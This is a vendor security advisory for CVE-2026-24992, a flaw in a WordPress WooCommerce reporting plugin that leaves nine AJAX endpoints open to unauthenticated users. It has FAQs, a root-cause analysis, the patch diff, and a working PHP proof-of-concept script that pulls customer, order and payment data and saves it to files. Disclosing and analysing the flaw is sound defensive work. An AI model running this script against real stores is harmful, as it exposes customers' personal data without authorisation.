What is CVE-2026-24992?

CVE-2026-24992 is a vulnerability in the Advanced WooCommerce Product Sales Reporting plugin for WordPress, affecting versions up to and including 4.1.2. It allows unauthenticated attackers to access sensitive information through improperly secured AJAX endpoints.

How does this vulnerability work?

The vulnerability arises from the lack of access control on several AJAX action handlers that process sensitive data. Attackers can send POST requests to the admin-ajax.php endpoint with specific action parameters to retrieve sensitive information without authentication.

Who is affected by CVE-2026-24992?

Any WordPress site using the Advanced WooCommerce Product Sales Reporting plugin version 4.1.2 or earlier is affected. Administrators should verify their plugin version to determine vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Advanced WooCommerce Product Sales Reporting plugin in your WordPress admin dashboard. If it is version 4.1.2 or earlier, your site is at risk.

How can I fix CVE-2026-24992?

The vulnerability is patched in version 4.1.3 of the plugin. Updating to this version or later will resolve the issue by implementing proper access controls on the affected AJAX endpoints.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin temporarily to prevent exploitation. Additionally, restrict access to the admin-ajax.php file through server configurations if feasible.

What does a CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure and should be addressed promptly.

What type of information can be exposed?

Exploitation of this vulnerability can expose sensitive data such as customer names, email addresses, order histories, payment methods, and product inventories, which can lead to privacy violations and competitive disadvantages.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can send POST requests to the vulnerable AJAX endpoints to retrieve sensitive data. It outlines the specific actions that can be exploited, illustrating the ease of accessing sensitive information.

What are AJAX endpoints and why are they important?

AJAX endpoints in WordPress allow asynchronous requests to be processed without reloading the page. They are important for dynamic content updates, but if not properly secured, they can expose sensitive data to unauthorized users.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your server logs for unusual activity, change all relevant passwords, and consider restoring your site from a backup. Conduct a thorough security audit to identify and mitigate any further risks.

Where can I find more information about this vulnerability?

Further information about CVE-2026-24992 can be found on the official CVE database, security advisories from plugin developers, and security blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24992: Advanced WooCommerce Product Sales Reporting <= 4.1.2 – Unauthenticated Information Exposure (webd-woocommerce-advanced-reporting-statistics)

CVE ID CVE-2026-24992

Plugin webd-woocommerce-advanced-reporting-statistics

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 4.1.2

Patched Version 4.1.3

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24992:
The Advanced WooCommerce Product Sales Reporting plugin for WordPress, versions up to and including 4.1.2, contains an unauthenticated information exposure vulnerability. This flaw allows any remote attacker to extract sensitive WooCommerce store data, including order details, customer information, product data, and sales statistics. The vulnerability stems from improper access control on multiple AJAX endpoints.

Atomic Edge research identifies the root cause in the plugin’s `helper-class.php` file. The `__construct` method (lines 101-138 in the vulnerable version) registers nine AJAX action handlers with both authenticated (`wp_ajax_`) and unauthenticated (`wp_ajax_nopriv_`) hooks. These handlers include `getOrders`, `get_orders`, `get_customers`, `get_countries`, `get_payments`, `get_coupons`, `get_products`, `get_categories`, and `display_orders_by_period`. Each handler function processes sensitive database queries without verifying the user’s authorization. The functions lack capability checks, allowing complete public access to administrative reporting data.

Exploitation requires sending POST requests to the WordPress admin-ajax.php endpoint with specific action parameters. Attackers can target `/wp-admin/admin-ajax.php` with POST data containing `action=get_customers` to retrieve customer lists, `action=get_orders` to obtain order details, or `action=get_products` to access product information. No authentication credentials or nonce values are required. The attacker can filter results using additional POST parameters like `customer`, `order_status`, or `product` to extract specific datasets. All nine exposed endpoints accept the same attack vector.

The patch in version 4.1.3 removes all `wp_ajax_nopriv_` hook registrations from the constructor (lines 101-119 in patched code). It adds mandatory `current_user_can(‘manage_woocommerce’)` capability checks at the beginning of each handler function. The patch modifies `display_orders_by_period` (line 183), `getOrders` (line 463), `get_orders` (line 730), `get_customers` (line 811), `get_countries` (line 943), `get_payments` (line 1041), `get_coupons` (line 1138), `get_products` (line 1224), and `get_categories` (line 1356). These changes restrict access to users with WooCommerce management privileges only.

Successful exploitation exposes comprehensive store data to unauthenticated attackers. This includes customer names, email addresses, order histories, payment methods, product inventories, sales figures, and geographic sales distributions. Attackers can use this information for competitive intelligence, targeted phishing campaigns, or reconnaissance for further attacks. The exposed data violates customer privacy expectations and provides attackers with detailed insights into business operations.

Differential between vulnerable and patched code

Code Diff

--- a/webd-woocommerce-advanced-reporting-statistics/helper-class.php
+++ b/webd-woocommerce-advanced-reporting-statistics/helper-class.php
@@ -2,7 +2,7 @@
 /**
  * Advanced WooCommerce Product Sales Reporting - Statistics & Forecast - OrderProcessorHelp Class
  *
- * @version 4.1.2
+ * @version 4.1.3
  *
  * @author  WPFactory
  */
@@ -101,36 +101,19 @@

 	/**
 	 * Constructor.
+	 *
+	 * @version 4.1.3
 	 */
 	public function __construct() {
-
-		add_action( 'wp_ajax_getOrders',        array( $this,'getOrders' ) );
-		add_action( 'wp_ajax_nopriv_getOrders', array( $this,'getOrders' ) );
-
-		add_action( 'wp_ajax_get_orders',        array( $this,'get_orders' ) );
-		add_action( 'wp_ajax_nopriv_get_orders', array( $this,'get_orders' ) );
-
-		add_action( 'wp_ajax_get_customers',        array( $this,'get_customers' ) );
-		add_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );
-
-		add_action( 'wp_ajax_get_countries',        array( $this,'get_countries' ) );
-		add_action( 'wp_ajax_nopriv_get_countries', array( $this,'get_countries' ) );
-
-		add_action( 'wp_ajax_get_payments',        array( $this,'get_payments' ) );
-		add_action( 'wp_ajax_nopriv_get_payments', array( $this,'get_payments' ) );
-
-		add_action( 'wp_ajax_get_coupons',        array( $this,'get_coupons' ) );
-		add_action( 'wp_ajax_nopriv_get_coupons', array( $this,'get_coupons' ) );
-
-		add_action( 'wp_ajax_get_products',        array( $this,'get_products' ) );
-		add_action( 'wp_ajax_nopriv_get_products', array( $this,'get_products' ) );
-
-		add_action( 'wp_ajax_get_categories',        array( $this,'get_categories' ) );
-		add_action( 'wp_ajax_nopriv_get_categories', array( $this,'get_categories' ) );
-
-		add_action( 'wp_ajax_display_orders_by_period',        array( $this,'display_orders_by_period' ) );
-		add_action( 'wp_ajax_nopriv_display_orders_by_period', array( $this,'display_orders_by_period' ) );
-
+		add_action( 'wp_ajax_getOrders', array( $this,'getOrders' ) );
+		add_action( 'wp_ajax_get_orders', array( $this,'get_orders' ) );
+		add_action( 'wp_ajax_get_customers', array( $this,'get_customers' ) );
+		add_action( 'wp_ajax_get_countries', array( $this,'get_countries' ) );
+		add_action( 'wp_ajax_get_payments', array( $this,'get_payments' ) );
+		add_action( 'wp_ajax_get_coupons', array( $this,'get_coupons' ) );
+		add_action( 'wp_ajax_get_products', array( $this,'get_products' ) );
+		add_action( 'wp_ajax_get_categories', array( $this,'get_categories' ) );
+		add_action( 'wp_ajax_display_orders_by_period', array( $this,'display_orders_by_period' ) );
 	}

 	/**
@@ -174,7 +157,7 @@
 	/**
 	 * display_orders_by_period.
 	 *
-	 * @version 4.1.0
+	 * @version 4.1.3
 	 *
 	 * @todo    (v4.1.0) `$topush = 0.1`?
 	 * @todo    (v4.1.0) `forecastHoltWinters()`?
@@ -183,7 +166,8 @@

 		if (
 			'POST' === $_SERVER['REQUEST_METHOD'] &&
-			'display_orders_by_period' === $_POST['action']
+			'display_orders_by_period' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -192,15 +176,11 @@
 			$status         = get_option( $this->plugin . '_status', $default_status );

 			// Post variables from filter form
-			$customer_id  = (
-				empty( $_POST['customer'] ) ?
-				null :
-				sanitize_text_field( wp_unslash( $_POST['customer'] ) )
-			);
+			$customer_id  = $this->get_posted_customer_id();
 			$order_status = (
 				empty( $_POST['order_status'] ) ?
 				$status :
-				array( sanitize_text_field( wp_unslash( $_POST['order_status'] ) ) )
+				array( $this->get_posted_order_status() )
 			);
 			$period       = (
 				( isset( $_POST['tab'] ) && 'months' === $_POST['tab'] ) ?
@@ -301,7 +281,7 @@
 				$totals      = array();

 				if ( ! empty( $_POST['order_status'] ) ) {
-					$order_status = array( sanitize_text_field( wp_unslash( $_POST['order_status'] ) ) );
+					$order_status = array( $this->get_posted_order_status() );
 					$message = "<h3> " .
 						esc_html__( 'Orders with Status', 'webd-woocommerce-reporting-statistics' ) .
 						" " .
@@ -310,7 +290,7 @@
 				}

 				if ( ! empty( $_POST['customer'] ) ) {
-					$user = get_user_by( 'id', (int) $_POST['customer'] );
+					$user = get_user_by( 'id', $this->get_posted_customer_id() );
 					$message .= "<h3> for " .
 						esc_html( $user->first_name ) .
 						" " .
@@ -391,7 +371,7 @@
 				"</h3>";

 				if ( ! empty( $_POST['order_status'] ) ) {
-					$order_status = sanitize_text_field( wp_unslash( $_POST['order_status'] ) );
+					$order_status = $this->get_posted_order_status();
 					$nomessage .= "<h3> " .
 						esc_html__( ' with Status: ', 'webd-woocommerce-reporting-statistics' ) .
 						esc_html( $order_status ) .
@@ -399,7 +379,7 @@
 				}

 				if ( ! empty( $_POST['customer'] ) ) {
-					$user = get_user_by( 'id', (int) $_POST['customer'] );
+					$user = get_user_by( 'id', $this->get_posted_customer_id() );
 					$nomessage .= "<h3> " .
 						esc_html(
 							' for customer: ' .
@@ -426,7 +406,7 @@
 	/**
 	 * filter_orders.
 	 *
-	 * @version 4.1.0
+	 * @version 4.1.3
 	 */
 	public function filter_orders() {

@@ -455,15 +435,11 @@
 		$default_status = array( 'wc-completed', 'wc-processing', 'wc-on-hold', 'wc-refunded' );
 		$status         = get_option( $this->plugin . '_status', $default_status );

-		$customer     = (
-			empty( $_POST['customer'] ) ?
-			'' :
-			sanitize_text_field( wp_unslash( $_POST['customer'] ) )
-		);
+		$customer     = $this->get_posted_customer_id();
 		$order_status = (
 			empty( $_POST['order_status'] ) ?
 			$status :
-			sanitize_text_field( wp_unslash( $_POST['order_status'] ) )
+			$this->get_posted_order_status()
 		);

 		$filters = array(
@@ -480,13 +456,14 @@
 	/**
 	 * getOrders.
 	 *
-	 * @version 4.1.0
+	 * @version 4.1.3
 	 */
 	public function getOrders() {

 		if (
 			'POST' === $_SERVER['REQUEST_METHOD'] &&
-			'getOrders' === $_POST['action']
+			'getOrders' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			$args = array(
@@ -538,7 +515,7 @@
 			$message = '';

 			if ( ! empty( $_POST['order_status'] ) ) {
-				$order_status = array( sanitize_text_field( wp_unslash( $_POST['order_status'] ) ) );
+				$order_status = array( $this->get_posted_order_status() );
 				$message = "<h3> " .
 					esc_html__( 'Orders with Status', 'webd-woocommerce-reporting-statistics' ) .
 					" " .
@@ -573,7 +550,7 @@
 			}

 			if ( ! empty( $_POST['customer'] ) ) {
-				$user = get_user_by( 'id', (int) $_POST['customer'] );
+				$user = get_user_by( 'id', $this->get_posted_customer_id() );
 				$message .= "<h3> for " .
 					esc_html( $user->first_name ) .
 					" " .
@@ -688,7 +665,7 @@
 				"</h3>";

 				if ( ! empty( $_POST['order_status'] ) ) {
-					$order_status = sanitize_text_field( wp_unslash( $_POST['order_status'] ) );
+					$order_status = $this->get_posted_order_status();
 					$nomessage .= "<h3> " .
 						esc_html__( ' with Status: ', 'webd-woocommerce-reporting-statistics' ) .
 						esc_html( $order_status ) .
@@ -717,7 +694,7 @@
 				}

 				if ( ! empty( $_POST['customer'] ) ) {
-					$user = get_user_by( 'id', (int) $_POST['customer'] );
+					$user = get_user_by( 'id', $this->get_posted_customer_id() );
 					$nomessage .= "<h3> " .
 						esc_html(
 							' for customer: ' .
@@ -746,16 +723,15 @@
 	/**
 	 * get_orders.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_orders() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_orders' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_orders' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			if ( isset( $_POST['page'] ) ) {
@@ -830,16 +806,15 @@
 	/**
 	 * get_customers.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_customers() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_customers' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_customers' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -963,16 +938,15 @@
 	/**
 	 * get_countries.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_countries() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_countries' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_countries' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -1062,16 +1036,15 @@
 	/**
 	 * get_payments.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_payments() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_payments' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_payments' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -1160,16 +1133,15 @@
 	/**
 	 * get_coupons.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_coupons() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_coupons' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_coupons' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -1247,16 +1219,15 @@
 	/**
 	 * get_products.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_products() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_products' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_products' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -1380,16 +1351,15 @@
 	/**
 	 * get_categories.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 */
 	public function get_categories() {

 		if (
 			is_admin() &&
-			(
-				isset( $_POST['action'] ) &&
-				'get_categories' === $_POST['action']
-			)
+			isset( $_POST['action'] ) &&
+			'get_categories' === $_POST['action'] &&
+			current_user_can( 'manage_woocommerce' )
 		) {

 			global $wpdb;
@@ -1612,12 +1582,12 @@
 	/**
 	 * get_posted_ids.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 * @since   4.1.2
 	 */
 	function get_posted_ids() {
 		return array_map(
-			'intval',
+			'absint',
 			wp_unslash(
 				$_POST['ids']
 			)
@@ -1627,13 +1597,13 @@
 	/**
 	 * get_posted_product_id.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 * @since   4.1.2
 	 */
 	function get_posted_product_id() {
 		return (
 			! empty( $_POST['product'] ) ?
-			intval(
+			absint(
 				wp_unslash(
 					$_POST['product']
 				)
@@ -1645,18 +1615,54 @@
 	/**
 	 * get_posted_product_cat_id.
 	 *
-	 * @version 4.1.2
+	 * @version 4.1.3
 	 * @since   4.1.2
 	 */
 	function get_posted_product_cat_id() {
 		return (
 			! empty( $_POST['cat'] ) ?
-			intval(
+			absint(
 				wp_unslash(
 					$_POST['cat']
 				)
 			) :
 			null
+		);
+	}
+
+	/**
+	 * get_posted_customer_id.
+	 *
+	 * @version 4.1.3
+	 * @since   4.1.3
+	 */
+	function get_posted_customer_id() {
+		return (
+			! empty( $_POST['customer'] ) ?
+			absint(
+				wp_unslash(
+					$_POST['customer']
+				)
+			) :
+			null
+		);
+	}
+
+	/**
+	 * get_posted_order_status.
+	 *
+	 * @version 4.1.3
+	 * @since   4.1.3
+	 */
+	function get_posted_order_status() {
+		return (
+			! empty( $_POST['order_status'] ) ?
+			sanitize_key(
+				wp_unslash(
+					$_POST['order_status']
+				)
+			) :
+			null
 		);
 	}

--- a/webd-woocommerce-advanced-reporting-statistics/webd-woocommerce-reporting-statistics.php
+++ b/webd-woocommerce-advanced-reporting-statistics/webd-woocommerce-reporting-statistics.php
@@ -3,7 +3,7 @@
  * Plugin Name: Advanced WooCommerce Product Sales Reporting - Statistics & Forecast
  * Plugin URI: https://extend-wp.com/advanced-reporting-statistics-plugin-for-woocommerce/
  * Description: A comprehensive WordPress Plugin for WooCommerce Reports, Statistics, Analytics & Forecasting Tool for Orders, Sales, Products, Countries, Payment Gateways Shipping, Tax, Refunds, Top Products.
- * Version: 4.1.2
+ * Version: 4.1.3
  * Author: WPFactory
  * Author URI: https://wpfactory.com
  * WC requires at least: 2.2
@@ -14,12 +14,12 @@
  * License: GNU General Public License v3.0
  * License URI: http://www.gnu.org/licenses/gpl-3.0.html
  * Created On: 23-01-2019
- * Updated On: 26-12-2025
+ * Updated On: 14-01-2026
  */

 defined( 'ABSPATH' ) || exit;

-defined( 'WPFACTORY_WC_ARS_VERSION' ) || define( 'WPFACTORY_WC_ARS_VERSION', '4.1.2' );
+defined( 'WPFACTORY_WC_ARS_VERSION' ) || define( 'WPFACTORY_WC_ARS_VERSION', '4.1.3' );

 defined( 'WPFACTORY_WC_ARS_FILE' ) || define( 'WPFACTORY_WC_ARS_FILE', __FILE__ );

@@ -48,7 +48,7 @@
 /**
  * webdWoocommerceReportingStatistics class.
  *
- * @version 4.0.0
+ * @version 4.1.3
  *
  * @todo    (v4.0.0) cleanup notification (e.g., `push_not` AJAX action)
  * @todo    (v4.0.0) remove the "GO PRO" tab?
@@ -66,34 +66,36 @@
 	/**
 	 * Constructor.
 	 *
-	 * @version 4.0.0
+	 * @version 4.1.3
 	 */
 	public function __construct() {

-		add_action('admin_enqueue_scripts', array($this, 'BackEndScripts') );
+		add_action( 'admin_enqueue_scripts', array( $this, 'BackEndScripts' ) );

 		add_action( 'wpfactory_wc_ars_output_settings', array( $this, 'init' ) );

-		register_activation_hook( __FILE__,  array($this, 'onActivation') );
+		register_activation_hook( __FILE__, array( $this, 'onActivation' ) );

-		add_action("admin_init", array($this, 'settingsSection') );
+		add_action( 'admin_init', array( $this, 'settingsSection' ) );

-		if( isset( $_GET['page'] ) && $_GET['page'] == 'webd-woocommerce-reporting-statistics' ) {
-			add_action("admin_footer", array($this,"proModal" ) );
+		if (
+			isset( $_GET['page'] ) &&
+			'webd-woocommerce-reporting-statistics' === $_GET['page']
+		) {
+			add_action( 'admin_footer', array( $this, 'proModal' ) );
 		}

-		add_action( 'wp_ajax_nopriv_stat_extensions', array( $this,'extensions' ) );
 		add_action( 'wp_ajax_stat_extensions', array( $this,'extensions' ) );

 		// Deactivation survey
-		include( plugin_dir_path(__FILE__) .'/lib/codecabin/plugin-deactivation-survey/deactivate-feedback-form.php');
-		add_filter( 'codecabin_deactivate_feedback_form_plugins', function( $plugins ) {
+		include( plugin_dir_path( __FILE__ ) . '/lib/codecabin/plugin-deactivation-survey/deactivate-feedback-form.php' );
+		add_filter( 'codecabin_deactivate_feedback_form_plugins', function ( $plugins ) {
 			$plugins[] = (object) array(
 				'slug'    => 'webd-woocommerce-advanced-reporting-statistics',
 				'version' => '3.1',
 			);
 			return $plugins;
-		});
+		} );

 	}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24992 - Advanced WooCommerce Product Sales Reporting <= 4.1.2 - Unauthenticated Information Exposure

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Define all vulnerable AJAX actions exposed by the plugin
$vulnerable_actions = [
    'getOrders',               // Exposes order data
    'get_orders',              // Exposes paginated order data
    'get_customers',           // Exposes customer lists with details
    'get_countries',           // Exposes country-based sales data
    'get_payments',            // Exposes payment gateway statistics
    'get_coupons',             // Exposes coupon usage data
    'get_products',            // Exposes product sales data
    'get_categories',          // Exposes category sales data
    'display_orders_by_period' // Exposes time-based order statistics
];

foreach ($vulnerable_actions as $action) {
    echo "n[+] Testing action: {$action}n";
    
    // Prepare POST data with the target action
    $post_data = ['action' => $action];
    
    // Add optional filter parameters for some actions
    if ($action === 'get_orders') {
        $post_data['page'] = '1';
        $post_data['rows'] = '10';
    }
    
    // Initialize cURL session
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Execute request
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    // Check for successful data extraction
    if ($http_code === 200 && !empty($response)) {
        echo "  SUCCESS: Received " . strlen($response) . " bytesn";
        
        // Display first 500 characters of response
        $preview = substr($response, 0, 500);
        echo "  Preview: " . htmlspecialchars($preview) . "n";
        
        // Save full response to file
        $filename = "cve_2026_24992_{$action}_response.txt";
        file_put_contents($filename, $response);
        echo "  Full response saved to: {$filename}n";
    } else {
        echo "  FAILED: HTTP {$http_code} or empty responsen";
    }
    
    curl_close($ch);
    
    // Brief pause between requests
    sleep(1);
}

echo "n[+] Proof of Concept complete. Check generated files for extracted data.n";

?>

Frequently Asked Questions

What is CVE-2026-24992?
Understanding the vulnerability
CVE-2026-24992 is a vulnerability in the Advanced WooCommerce Product Sales Reporting plugin for WordPress, affecting versions up to and including 4.1.2. It allows unauthenticated attackers to access sensitive information through improperly secured AJAX endpoints.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of access control on several AJAX action handlers that process sensitive data. Attackers can send POST requests to the admin-ajax.php endpoint with specific action parameters to retrieve sensitive information without authentication.
Who is affected by CVE-2026-24992?
Identifying affected users
Any WordPress site using the Advanced WooCommerce Product Sales Reporting plugin version 4.1.2 or earlier is affected. Administrators should verify their plugin version to determine vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Advanced WooCommerce Product Sales Reporting plugin in your WordPress admin dashboard. If it is version 4.1.2 or earlier, your site is at risk.
How can I fix CVE-2026-24992?
Updating the plugin
The vulnerability is patched in version 4.1.3 of the plugin. Updating to this version or later will resolve the issue by implementing proper access controls on the affected AJAX endpoints.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the plugin temporarily to prevent exploitation. Additionally, restrict access to the admin-ajax.php file through server configurations if feasible.
What does a CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure and should be addressed promptly.
What type of information can be exposed?
Potential data leakage
Exploitation of this vulnerability can expose sensitive data such as customer names, email addresses, order histories, payment methods, and product inventories, which can lead to privacy violations and competitive disadvantages.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration
The proof of concept provided shows how an attacker can send POST requests to the vulnerable AJAX endpoints to retrieve sensitive data. It outlines the specific actions that can be exploited, illustrating the ease of accessing sensitive information.
What are AJAX endpoints and why are they important?
Role of AJAX in WordPress
AJAX endpoints in WordPress allow asynchronous requests to be processed without reloading the page. They are important for dynamic content updates, but if not properly secured, they can expose sensitive data to unauthorized users.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect exploitation, immediately review your server logs for unusual activity, change all relevant passwords, and consider restoring your site from a backup. Conduct a thorough security audit to identify and mitigate any further risks.
Where can I find more information about this vulnerability?
Resources for further reading
Further information about CVE-2026-24992 can be found on the official CVE database, security advisories from plugin developers, and security blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations